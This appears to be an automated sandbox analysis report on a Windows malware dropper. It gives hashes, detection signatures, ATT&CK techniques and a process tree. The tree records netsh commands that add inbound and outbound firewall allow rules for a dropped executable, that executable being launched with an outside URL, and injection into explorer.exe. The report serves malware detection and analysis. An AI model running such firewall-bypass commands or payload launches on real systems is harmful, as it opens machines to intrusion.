Overview
overview
8Static
static
78fa98d104b...3c.exe
windows7-x64
88fa98d104b...3c.exe
windows10-2004-x64
8$PLUGINSDI...el.dll
windows7-x64
7$PLUGINSDI...el.dll
windows10-2004-x64
7$PLUGINSDI...ec.dll
windows7-x64
3$PLUGINSDI...ec.dll
windows10-2004-x64
3$_70_/Basi...r1.exe
windows7-x64
3$_70_/Basi...r1.exe
windows10-2004-x64
3$_70_/dotN...up.exe
windows7-x64
7$_70_/dotN...up.exe
windows10-2004-x64
7$_70_/hapjyaj.exe
windows7-x64
3$_70_/hapjyaj.exe
windows10-2004-x64
3Analysis
-
max time kernel
92s -
max time network
143s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
27-01-2025 04:25
Behavioral task
behavioral1
Sample
8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
$PLUGINSDIR/SelfDel.dll
Resource
win7-20240903-en
Behavioral task
behavioral4
Sample
$PLUGINSDIR/SelfDel.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
$PLUGINSDIR/nsExec.dll
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
$PLUGINSDIR/nsExec.dll
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
$_70_/BasicCalculator1.exe
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
$_70_/BasicCalculator1.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
$_70_/dotNetFx45_Full_setup.exe
Resource
win7-20241023-en
Behavioral task
behavioral10
Sample
$_70_/dotNetFx45_Full_setup.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
$_70_/hapjyaj.exe
Resource
win7-20240903-en
Behavioral task
behavioral12
Sample
$_70_/hapjyaj.exe
Resource
win10v2004-20241007-en
General
-
Target
8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe
-
Size
983KB
-
MD5
e869ad846639738812a1cb901f801120
-
SHA1
730e00adff312d1232ea7279926b4018cf0d853b
-
SHA256
8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c
-
SHA512
d8bd53d5e82a3bdcdb0cb0fa5e928e476be87450ad0e4bb03046f5231f5d4f45b2457820cb918122daabf3f9d3737c2e70ed71c74dea85fdbc70ddc2d8732b08
-
SSDEEP
24576:9GiQdsdzTxXMQCMDtUrbtoKXhn7Hu+tjqUx+kchEvoU:87gxcrNbuK0+tWOchE3
Malware Config
Signatures
-
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 1056 netsh.exe 3220 netsh.exe -
ACProtect 1.3x - 1.4x DLL software 2 IoCs
Detects file using ACProtect software.
resource yara_rule behavioral2/files/0x0007000000023cb2-15.dat acprotect behavioral2/memory/3316-17-0x0000000075200000-0x0000000075209000-memory.dmp acprotect -
Deletes itself 1 IoCs
pid Process 5004 explorer.exe -
Executes dropped EXE 1 IoCs
pid Process 2416 hapjyaj.exe -
Loads dropped DLL 3 IoCs
pid Process 3316 8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe 3316 8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe 3316 8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 3316 set thread context of 5004 3316 8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe 90 -
resource yara_rule behavioral2/files/0x0007000000023cb2-15.dat upx behavioral2/memory/3316-17-0x0000000075200000-0x0000000075209000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 6 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hapjyaj.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language explorer.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2416 hapjyaj.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 2416 hapjyaj.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 2416 hapjyaj.exe -
Suspicious use of WriteProcessMemory 13 IoCs
description pid Process procid_target PID 3316 wrote to memory of 1056 3316 8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe 85 PID 3316 wrote to memory of 1056 3316 8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe 85 PID 3316 wrote to memory of 1056 3316 8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe 85 PID 3316 wrote to memory of 3220 3316 8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe 87 PID 3316 wrote to memory of 3220 3316 8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe 87 PID 3316 wrote to memory of 3220 3316 8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe 87 PID 3316 wrote to memory of 2416 3316 8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe 89 PID 3316 wrote to memory of 2416 3316 8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe 89 PID 3316 wrote to memory of 2416 3316 8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe 89 PID 3316 wrote to memory of 5004 3316 8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe 90 PID 3316 wrote to memory of 5004 3316 8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe 90 PID 3316 wrote to memory of 5004 3316 8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe 90 PID 3316 wrote to memory of 5004 3316 8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe 90
Processes
-
C:\Users\Admin\AppData\Local\Temp\8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe"C:\Users\Admin\AppData\Local\Temp\8fa98d104bb8fcfe1a6200ece1c02faf9e8d12e31d0c6fbc6bbf3d3882b7fd3c.exe"1⤵
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3316 -
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name=hapjyaj dir=in action=allow program="C:\Users\Admin\AppData\Local\Temp\nsnDA34.tmp\hapjyaj.exe" enable=yes profile=public,private2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:1056
-
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name=hapjyaj dir=out action=allow program="C:\Users\Admin\AppData\Local\Temp\nsnDA34.tmp\hapjyaj.exe" enable=yes profile=public,private2⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:3220
-
-
C:\Users\Admin\AppData\Local\Temp\nsnDA34.tmp\hapjyaj.exe"C:\Users\Admin\AppData\Local\Temp\nsnDA34.tmp\hapjyaj.exe" "http://www.marvburris.click" "C:\Users\Admin\AppData\Local\Temp\nsnDA34.tmp\8197"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2416
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\system32\explorer.exe2⤵
- Deletes itself
- System Location Discovery: System Language Discovery
PID:5004
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Event Triggered Execution
1Netsh Helper DLL
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5e5786e8703d651bc8bd4bfecf46d3844
SHA1fee5aa4b325deecbf69ccb6eadd89bd5ae59723f
SHA256d115bce0a787b4f895e700efe943695c8f1087782807d91d831f6015b0f98774
SHA512d14ad43a01db19428cd8ccd2fe101750860933409b5be2eb85a3e400efcd37b1b6425ce84e87a7fe46ecabc7b91c4b450259e624c178b86e194ba7da97957ba3
-
Filesize
10KB
MD59916cd804c030ab91eabab4c3d1f39f6
SHA1d01995ac1f61a17211b0c942d38504e35ac89c1a
SHA2566920bf36c100c838c5fcc48b3665f660e0c158449ed1a42f64cb1c054cf90eef
SHA512db60ef4e82328841153114c002c7d7664c5f7b7e5a916ea106912a0fe5a9f86a4ffc0a8f062f3cc974982efbc9b0ee7ff56582efe77e34dca001fc8b79d8ccc4
-
Filesize
257B
MD5441f5c5c7933c16068a03d99bc8837c4
SHA176d1de63216c2c1218cf47a5d768a18952a1dcb3
SHA256f1cac503709c2acd9ab0a7d0e48a4abf2777d16052fee68830260a78359ec72f
SHA5125b8fa02b827993541841a2fd07a50e5d2c5a7f5ba35e0b282ed3a453e3f919d63f1c9432d922cc364027351c57d2b78f99f5f1469c86b581cc53acb76fdfc366
-
Filesize
7KB
MD511092c1d3fbb449a60695c44f9f3d183
SHA1b89d614755f2e943df4d510d87a7fc1a3bcf5a33
SHA2562cd3a2d4053954db1196e2526545c36dfc138c6de9b81f6264632f3132843c77
SHA512c182e0a1f0044b67b4b9fb66cef9c4955629f6811d98bbffa99225b03c43c33b1e85cacabb39f2c45ead81cd85e98b201d5f9da4ee0038423b1ad947270c134a